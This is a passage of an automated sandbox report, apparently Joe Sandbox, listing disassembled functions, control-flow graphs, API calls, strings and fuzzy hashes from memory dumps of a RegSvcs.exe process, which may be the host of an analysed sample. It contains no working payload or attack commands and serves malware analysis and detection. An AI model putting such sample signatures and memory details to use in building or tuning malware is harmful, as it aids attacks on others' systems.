                                                              • Source File: 00000015.00000002.1651072866.00000000013B6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                              • Associated: 00000015.00000002.1651072866.0000000001390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.0000000001397000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.0000000001416000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.0000000001452000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.00000000014B3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.00000000014B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_21_2_1390000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 6642049f536dd82acabbe04f0f1e1d615c32893709fc4dcc2c9256c47680ab88
                                                              • Instruction ID: f7abb23741fb9631f90feba312cfc9c607e7d2b337425d0ce8d941c3e46450b8
                                                              • Opcode Fuzzy Hash: 6642049f536dd82acabbe04f0f1e1d615c32893709fc4dcc2c9256c47680ab88
                                                              • Instruction Fuzzy Hash: 4C90027224240103410571584414616500A97F1241B55C022E1014591DC73589916225
                                                              Function 01402DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 5 1402df0-1402dfc LdrInitializeThunk
                                                              APIs
                                                              • LdrInitializeThunk.NTDLL(0143E73E,0000005A,0149D040,00000020,00000000,0149D040,00000080,01424A81,00000000,-00000001,-00000001,00000002,00000000,?,-00000001,0140AE00), ref: 01402DFA
                                                              Memory Dump Source
                                                              • Source File: 00000015.00000002.1651072866.00000000013B6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                              • Associated: 00000015.00000002.1651072866.0000000001390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.0000000001397000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.0000000001416000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.0000000001452000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.00000000014B3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.00000000014B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_21_2_1390000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 95a2c798df9ddaa05638e30f6d79b8ffcea2b1aeddd04a0066dfc8f9d1f29805
                                                              • Instruction ID: f5e6ed4886cc5ef95be3475614219ccbdc8723122e8b6fd04ba2f711a0c1abc2
                                                              • Opcode Fuzzy Hash: 95a2c798df9ddaa05638e30f6d79b8ffcea2b1aeddd04a0066dfc8f9d1f29805
                                                              • Instruction Fuzzy Hash: 6590023224140513D11171584504707100997E1281F95C413A0424559DD7668A52A221
                                                              Function 014035C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 6 14035c0-14035cc LdrInitializeThunk
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000015.00000002.1651072866.00000000013B6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                              • Associated: 00000015.00000002.1651072866.0000000001390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.0000000001397000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.0000000001416000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.0000000001452000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.00000000014B3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.00000000014B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_21_2_1390000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: fd67095d56fb4e412ef187d791e7ada900a7d43b49f031a5efa22d159e8d1974
                                                              • Instruction ID: 40f2871b52f63c88f4cc1c547e67aebb1aa290b211a99a4ba27bdc265d11c441
                                                              • Opcode Fuzzy Hash: fd67095d56fb4e412ef187d791e7ada900a7d43b49f031a5efa22d159e8d1974
                                                              • Instruction Fuzzy Hash: 4190023264550503D10071584514706200597E1241F65C412A0424569DC7A58A5166A2
                                                              Function 0042E443 Relevance: .0, Instructions: 44COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 19 42e443-42e484 call 42e933 23 42e486-42e4a3 19->23 24 42e4de-42e4e3 19->24 26 42e4b6-42e4db 23->26 27 42e4a5-42e4ad 23->27 26->24 28 42e4b3 27->28 28->26
                                                              Memory Dump Source
                                                              • Source File: 00000015.00000002.1650706101.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_21_2_42e000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b91d6c93db0535fe72404564a29c3e6695632f1d3c42c2318da097e51fd83d29
                                                              • Instruction ID: 4366241f30172668ac266cf9dbbaaf2ab3a96406b79bd4ea90d7b1ecfc278b4f
                                                              • Opcode Fuzzy Hash: b91d6c93db0535fe72404564a29c3e6695632f1d3c42c2318da097e51fd83d29
                                                              • Instruction Fuzzy Hash: 6B017971D0122866FB60EB95AC42FD973B89B08315F4006DAF50CA25C1FF74A78C8A55
                                                              Function 0042E43E Relevance: .0, Instructions: 44COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 7 42e43e-42e45a 8 42e469-42e470 7->8 9 42e464 call 42e933 7->9 10 42e47f-42e484 8->10 9->8 11 42e486-42e48f 10->11 12 42e4de-42e4e3 10->12 13 42e49e-42e4a3 11->13 14 42e4b6-42e4db 13->14 15 42e4a5-42e4ad 13->15 14->12 16 42e4b3 15->16 16->14
                                                              Memory Dump Source
                                                              • Source File: 00000015.00000002.1650706101.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_21_2_42e000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d1f73a97459dc5326ad298b62fd1992b1f71635c7eaa89ed498aed683d0cc593
                                                              • Instruction ID: 404c73420e7ccc61c58b20341cebbccbd52cb142bdd450d9b6ac3c885e858c85
                                                              • Opcode Fuzzy Hash: d1f73a97459dc5326ad298b62fd1992b1f71635c7eaa89ed498aed683d0cc593
                                                              • Instruction Fuzzy Hash: 42019671D021246AFB60EB95AC42FDDB3B49B08305F400ADAE508A2581EF78A7888B55
                                                              Function 0042E7F7 Relevance: .0, Instructions: 33COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 31 42e7f7-42e801 32 42e803-42e82e 31->32 33 42e834-42e845 32->33
                                                              Memory Dump Source
                                                              • Source File: 00000015.00000002.1650706101.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_21_2_42e000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f517df6aac4fc84ce8a87d0679e17b2a921ba94886c7872b57f22e959787194e
                                                              • Instruction ID: 31242dfcbd3f96dd699b4558cde109ee15ad417a935ac94cd5934c0012438835
                                                              • Opcode Fuzzy Hash: f517df6aac4fc84ce8a87d0679e17b2a921ba94886c7872b57f22e959787194e
                                                              • Instruction Fuzzy Hash: C0F03A7661030AAFDB04CF55D885EEBB3ADBB88350F44C219FD198B641EB75E910CBA0
                                                              Function 0042E969 Relevance: .0, Instructions: 30COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 34 42e969-42e988 35 42e98e-42e995 34->35 36 42e997-42e999 35->36 37 42e9a9-42e9ac 35->37 36->37 38 42e99b-42e9a7 call 42e933 36->38 38->37
                                                              Memory Dump Source
                                                              • Source File: 00000015.00000002.1650706101.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_21_2_42e000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 91ad61eaa096fd1b48b4794f7a42c5454aa66564d8e26f254c8216750448d8ed
                                                              • Instruction ID: 9450f4893f1b544faf21d748d5bf1faa69d539990d9b7b546b78aef50944f596
                                                              • Opcode Fuzzy Hash: 91ad61eaa096fd1b48b4794f7a42c5454aa66564d8e26f254c8216750448d8ed
                                                              • Instruction Fuzzy Hash: 25E09B72F412246BD7209666AC05FABB768DFD1760F18007FFD0897341E175585087D9
                                                              Function 0042E973 Relevance: .0, Instructions: 28COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 43 42e973-42e988 44 42e98e-42e995 43->44 45 42e997-42e999 44->45 46 42e9a9-42e9ac 44->46 45->46 47 42e99b-42e9a7 call 42e933 45->47 47->46
                                                              Memory Dump Source
                                                              • Source File: 00000015.00000002.1650706101.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_21_2_42e000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 72c85ca60cf26629b888706018e63b4fd17f9be6f1efe7643e2c5c8123341bf7
                                                              • Instruction ID: b45b16270b7c92ecc088d3bbc55ba942c8e19ef5250ac7cf6bfce4062317808b
                                                              • Opcode Fuzzy Hash: 72c85ca60cf26629b888706018e63b4fd17f9be6f1efe7643e2c5c8123341bf7
                                                              • Instruction Fuzzy Hash: 04E0D87270022427D620554AAC05FAB735C9FC0B20F48002BFE0897301D164A84082E9
                                                              Function 0042E803 Relevance: .0, Instructions: 28COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 41 42e803-42e82e 42 42e834-42e845 41->42
                                                              Memory Dump Source
                                                              • Source File: 00000015.00000002.1650706101.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_21_2_42e000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e5fdaa5cb08acbbdf9c8b0a0c6bbe4ed815358be749576dea5613706cb188032
                                                              • Instruction ID: ed3f3c4a1f71d5893b28c54a4458e4a2cb9e16b5f970c0aa03921f96b0cc64a3
                                                              • Opcode Fuzzy Hash: e5fdaa5cb08acbbdf9c8b0a0c6bbe4ed815358be749576dea5613706cb188032
                                                              • Instruction Fuzzy Hash: EFF098B6610209AFDB04CF59D885EEB73A9BB88750F048559FD198B241D774EA108BA1
                                                              Function 0042E893 Relevance: .0, Instructions: 13COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 50 42e893-42e8a6 51 42e8ac-42e8b0 50->51
                                                              Memory Dump Source
                                                              • Source File: 00000015.00000002.1650706101.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_21_2_42e000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1588e10cb8000158141308b7c049b3d6da6c26fcd9cfad5ec22e1243578cb56d
                                                              • Instruction ID: 3eca5127519bf68b1d5e67e2a562a6eab0631c4a37908332f397cdab7da05a69
                                                              • Opcode Fuzzy Hash: 1588e10cb8000158141308b7c049b3d6da6c26fcd9cfad5ec22e1243578cb56d
                                                              • Instruction Fuzzy Hash: 9AC012716002086BDB00DA88DC46F66339C9748610F444455B91C8B241D571B9504698

                                                              Non-executed Functions

                                                              Function 01404A80 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 51timeCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 52 1404a80-1404a8b 53 1404a8d-1404a99 RtlDebugPrintTimes 52->53 54 1404a9f-1404aa6 52->54 53->54 59 1404b25-1404b26 53->59 55 1404aa8-1404aae 54->55 56 1404aaf-1404ab6 call 13ef5a0 54->56 61 1404b23 56->61 62 1404ab8-1404b22 call 13f1e46 * 2 56->62 61->59 62->61
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000015.00000002.1651072866.00000000013B6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                              • Associated: 00000015.00000002.1651072866.0000000001390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.0000000001397000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.0000000001416000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.0000000001452000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.00000000014B3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.00000000014B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_21_2_1390000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID: 0Ivw$0Ivw$0Ivw$0Ivw$0Ivw$0Ivw
                                                              • API String ID: 3446177414-4119021165
                                                              • Opcode ID: 6d82698262fc0b2c7e8818e0a914f603aa3fd8ea6b9e706ff6b31cab079df5e0
                                                              • Instruction ID: a96151b2b260a5d715bff013d83706363027af788f882e65160c21e1f5cf3146
                                                              • Opcode Fuzzy Hash: 6d82698262fc0b2c7e8818e0a914f603aa3fd8ea6b9e706ff6b31cab079df5e0
                                                              • Instruction Fuzzy Hash: 820144F19056146BE7219B2DF4C47862AA1B78672CF09006BEB089B2F4D7704841E7A0
                                                              Function 01402890 Relevance: 9.2, APIs: 6, Instructions: 190COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 263 1402890-14028b3 264 14028b9-14028cc 263->264 265 143a4bc-143a4c0 263->265 267 14028dd-14028df 264->267 268 14028ce-14028d7 264->268 265->264 266 143a4c6-143a4ca 265->266 266->264 271 143a4d0-143a4d4 266->271 270 14028e1-14028e5 267->270 268->267 269 143a57e-143a585 268->269 269->267 272 1402988-140298e 270->272 273 14028eb-14028fa 270->273 271->264 274 143a4da-143a4de 271->274 277 1402908-140290c 272->277 275 1402900-1402905 273->275 276 143a58a-143a58d 273->276 274->264 278 143a4e4-143a4eb 274->278 275->277 276->277 277->270 279 140290e-140291b 277->279 280 143a564-143a56c 278->280 281 143a4ed-143a4f4 278->281 282 143a592-143a599 279->282 283 1402921 279->283 280->264 284 143a572-143a576 280->284 285 143a4f6-143a4fe 281->285 286 143a50b 281->286 291 143a5a1-143a5c9 call 1410050 282->291 289 1402924-1402926 283->289 284->264 290 143a57c call 1410050 284->290 285->264 287 143a504-143a509 285->287 288 143a510-143a536 call 1410050 286->288 287->288 303 143a55d-143a55f 288->303 293 1402993-1402995 289->293 294 1402928-140292a 289->294 290->303 293->294 298 1402997-14029b1 call 1410050 293->298 300 1402946-1402966 call 1410050 294->300 301 140292c-140292e 294->301 312 1402969-1402974 298->312 300->312 301->300 306 1402930-1402944 call 1410050 301->306 309 1402981-1402985 303->309 306->300 312->289 314 1402976-1402979 312->314 314->291 315 140297f 314->315 315->309
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000015.00000002.1651072866.00000000013B6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                              • Associated: 00000015.00000002.1651072866.0000000001390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.0000000001397000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.0000000001416000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.0000000001452000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.00000000014B3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.00000000014B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_21_2_1390000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID:
                                                              • API String ID: 48624451-0
                                                              • Opcode ID: 49b76da480f514bd446ec6b15101aa0300ef02b93a962733fe7bf915a812d5c1
                                                              • Instruction ID: a6cc80d9846b394ae7afeb41e85ad65c9ce7c92426e7ffe14f82b43fa3666535
                                                              • Opcode Fuzzy Hash: 49b76da480f514bd446ec6b15101aa0300ef02b93a962733fe7bf915a812d5c1
                                                              • Instruction Fuzzy Hash: F351D6B6A00116AFCB12DBAE888497FFBB8BB58240714827BF595D77D1D374DE4087A0
                                                              Function 013DA250 Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 404COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 316 13da250-13da26f 317 13da58d-13da594 316->317 318 13da275-13da291 316->318 317->318 321 13da59a-14279bb 317->321 319 14279e6-14279eb 318->319 320 13da297-13da2a0 318->320 320->319 322 13da2a6-13da2ac 320->322 321->318 326 14279c1-14279c6 321->326 324 13da6ba-13da6bc 322->324 325 13da2b2-13da2b4 322->325 327 13da2ba-13da2bd 324->327 328 13da6c2 324->328 325->319 325->327 329 13da473-13da479 326->329 327->319 330 13da2c3-13da2c6 327->330 328->330 331 13da2c8-13da2d1 330->331 332 13da2da-13da2dd 330->332 333 14279cb-14279d5 331->333 334 13da2d7 331->334 335 13da6c7-13da6d0 332->335 336 13da2e3-13da32b 332->336 338 14279da-14279e3 call 144f290 333->338 334->332 335->336 337 13da6d6-14279ff 335->337 339 13da330-13da335 336->339 337->338 338->319 342 13da47c-13da47f 339->342 343 13da33b-13da343 339->343 344 13da34f-13da35d 342->344 345 13da485-13da488 342->345 343->344 347 13da345-13da349 343->347 348 13da48e-13da49e 344->348 351 13da363-13da368 344->351 345->348 349 1427a16-1427a19 345->349 347->344 350 13da59f-13da5a8 347->350 348->349 354 13da4a4-13da4ad 348->354 352 13da36c-13da36e 349->352 353 1427a1f-1427a24 349->353 355 13da5aa-13da5ac 350->355 356 13da5c0-13da5c3 350->356 351->352 357 1427a26 352->357 358 13da374-13da38c call 13da6e0 352->358 359 1427a2b 353->359 354->352 355->344 360 13da5b2-13da5bb 355->360 361 1427a01 356->361 362 13da5c9-13da5cc 356->362 357->359 369 13da4b2-13da4b9 358->369 370 13da392-13da3ba 358->370 364 1427a2d-1427a2f 359->364 360->352 365 1427a0c 361->365 362->365 366 13da5d2-13da5d5 362->366 364->329 368 1427a35 364->368 365->349 366->355 371 13da3bc-13da3be 369->371 372 13da4bf-13da4c2 369->372 370->371 371->364 373 13da3c4-13da3cb 371->373 372->371 374 13da4c8-13da4d3 372->374 375 1427ae0 373->375 376 13da3d1-13da3d4 373->376 374->339 378 1427ae4-1427afc call 144f290 375->378 377 13da3e0-13da3ea 376->377 377->378 379 13da3f0-13da40c call 13da840 377->379 378->329 384 13da5d7-13da5e0 379->384 385 13da412-13da417 379->385 386 13da601-13da603 384->386 387 13da5e2-13da5eb 384->387 385->329 388 13da419-13da43d 385->388 390 13da629-13da631 386->390 391 13da605-13da623 call 13c4508 386->391 387->386 389 13da5ed-13da5f1 387->389 392 13da440-13da443 388->392 393 13da5f7-13da5fb 389->393 394 13da681-13da6ab RtlDebugPrintTimes 389->394 391->329 391->390 396 13da449-13da44c 392->396 397 13da4d8-13da4dc 392->397 393->386 393->394 394->386 410 13da6b1-13da6b5 394->410 401 1427ad6 396->401 402 13da452-13da454 396->402 399 1427a3a-1427a42 397->399 400 13da4e2-13da4e5 397->400 404 13da634-13da64a 399->404 405 1427a48-1427a4c 399->405 400->404 406 13da4eb-13da4ee 400->406 401->375 407 13da45a-13da461 402->407 408 13da520-13da539 call 13da6e0 402->408 411 13da4f4-13da50c 404->411 412 13da650-13da659 404->412 405->404 413 1427a52-1427a5b 405->413 406->396 406->411 414 13da57b-13da582 407->414 415 13da467-13da46c 407->415 422 13da53f-13da567 408->422 423 13da65e-13da665 408->423 410->386 411->396 421 13da512-13da51b 411->421 412->402 419 1427a85-1427a87 413->419 420 1427a5d-1427a60 413->420 414->377 418 13da588 414->418 415->329 416 13da46e 415->416 416->329 418->375 419->404 424 1427a8d-1427a96 419->424 425 1427a62-1427a6c 420->425 426 1427a6e-1427a71 420->426 421->402 427 13da569-13da56b 422->427 423->427 428 13da66b-13da66e 423->428 424->402 429 1427a81 425->429 430 1427a73-1427a7c 426->430 431 1427a7e 426->431 427->415 432 13da571-13da573 427->432 428->427 433 13da674-13da67c 428->433 429->419 430->424 431->429 434 13da579 432->434 435 1427a9b-1427aa4 432->435 433->392 434->414 435->434 436 1427aaa-1427ab0 435->436 436->434 437 1427ab6-1427abe 436->437 437->434 438 1427ac4-1427acf 437->438 438->437 439 1427ad1 438->439 439->434
                                                              Strings
                                                              • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 014279FA
                                                              • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 014279D5
                                                              • RtlpFindActivationContextSection_CheckParameters, xrefs: 014279D0, 014279F5
                                                              • SsHd, xrefs: 013DA3E4
                                                              Memory Dump Source
                                                              • Source File: 00000015.00000002.1651072866.00000000013B6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                              • Associated: 00000015.00000002.1651072866.0000000001390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.0000000001397000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.0000000001416000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.0000000001452000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.00000000014B3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.00000000014B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_21_2_1390000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                              • API String ID: 0-929470617
                                                              • Opcode ID: 6492af3284cc981f3765e30cec11571edbaa72f2a8bf508da9f2470e170ebd50
                                                              • Instruction ID: 52f34876b97cd6e1bed6c1b5f15f571f5275a072bb049b7851ac6e9a7ea6f9d0
                                                              • Opcode Fuzzy Hash: 6492af3284cc981f3765e30cec11571edbaa72f2a8bf508da9f2470e170ebd50
                                                              • Instruction Fuzzy Hash: 71E1F572604301CFE725CE2CD684B2BBBE5BB84228F544A2EF995CB391D731D985CB81
                                                              Function 013DD770 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 372timeCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 440 13dd770-13dd7ab 441 13dd9e7-13dd9ee 440->441 442 13dd7b1-13dd7bb 440->442 441->442 445 13dd9f4-142932c 441->445 443 1429357 442->443 444 13dd7c1-13dd7ca 442->444 451 1429361-1429370 443->451 444->443 446 13dd7d0-13dd7d3 444->446 445->442 450 1429332-1429337 445->450 448 13dd7d9-13dd7db 446->448 449 13dd9da-13dd9dc 446->449 448->443 452 13dd7e1-13dd7e4 448->452 449->452 454 13dd9e2 449->454 453 13dd927-13dd938 call 1404c30 450->453 455 142934b-1429354 call 144f290 451->455 452->443 456 13dd7ea-13dd7ed 452->456 454->456 455->443 459 13dd9f9-13dda02 456->459 460 13dd7f3-13dd7f6 456->460 459->460 463 13dda08-1429346 459->463 464 13dda0d-13dda16 460->464 465 13dd7fc-13dd848 call 13dd660 460->465 463->455 464->465 467 13dda1c 464->467 465->453 470 13dd84e-13dd852 465->470 467->451 470->453 471 13dd858-13dd85f 470->471 472 13dd865-13dd869 471->472 473 13dd9d1-13dd9d5 471->473 475 13dd870-13dd87a 472->475 474 1429563-142957b call 144f290 473->474 474->453 475->474 477 13dd880-13dd887 475->477 478 13dd8ed-13dd90d 477->478 479 13dd889-13dd88d 477->479 483 13dd910-13dd913 478->483 481 1429372 479->481 482 13dd893-13dd898 479->482 485 1429379-142937b 481->485 484 13dd89e-13dd8a5 482->484 482->485 486 13dd93b-13dd940 483->486 487 13dd915-13dd918 483->487 491 13dd8ab-13dd8e3 call 1408250 484->491 492 14293ea-14293ed 484->492 485->484 490 1429381-14293aa 485->490 488 14294d3-14294db 486->488 489 13dd946-13dd949 486->489 493 13dd91e-13dd920 487->493 494 1429559-142955e 487->494 495 14294e1-14294e5 488->495 496 13dda21-13dda2f 488->496 489->496 497 13dd94f-13dd952 489->497 490->478 498 14293b0-14293ca call 14182c0 490->498 514 13dd8e5-13dd8e7 491->514 500 14293f1-1429400 call 14182c0 492->500 501 13dd971-13dd98c call 13da6e0 493->501 502 13dd922 493->502 494->453 495->496 503 14294eb-14294f4 495->503 504 13dd954-13dd964 496->504 506 13dda35-13dda3e 496->506 497->487 497->504 498->514 519 14293d0-14293e3 498->519 524 1429402-1429410 500->524 525 1429417 500->525 521 1429528-142952d 501->521 522 13dd992-13dd9ba 501->522 502->453 510 1429512-1429514 503->510 511 14294f6-14294f9 503->511 504->487 512 13dd966-13dd96f 504->512 506->493 510->496 523 142951a-1429523 510->523 517 1429503-1429506 511->517 518 14294fb-1429501 511->518 512->493 514->478 520 1429420-1429424 514->520 527 1429508-142950d 517->527 528 142950f 517->528 518->510 519->498 529 14293e5 519->529 520->478 526 142942a-1429430 520->526 530 13dd9bc-13dd9be 521->530 531 1429533-1429536 521->531 522->530 523->493 524->500 532 1429412 524->532 525->520 533 1429432-142944f 526->533 534 1429457-1429460 526->534 527->523 528->510 529->478 535 13dd9c4-13dd9cb 530->535 536 1429549-142954e 530->536 531->530 537 142953c-1429544 531->537 532->478 533->534 538 1429451-1429454 533->538 539 1429462-1429467 534->539 540 14294a7-14294a9 534->540 535->473 535->475 536->453 541 1429554 536->541 537->483 538->534 539->540 542 1429469-142946d 539->542 543 14294ab-14294c6 call 13c4508 540->543 544 14294cc-14294ce 540->544 541->494 545 1429475-14294a1 RtlDebugPrintTimes 542->545 546 142946f-1429473 542->546 543->453 543->544 544->453 545->540 550 14294a3 545->550 546->540 546->545 550->540
                                                              APIs
                                                              Strings
                                                              • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 0142936B
                                                              • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 01429346
                                                              • RtlpFindActivationContextSection_CheckParameters, xrefs: 01429341, 01429366
                                                              • GsHd, xrefs: 013DD874
                                                              Memory Dump Source
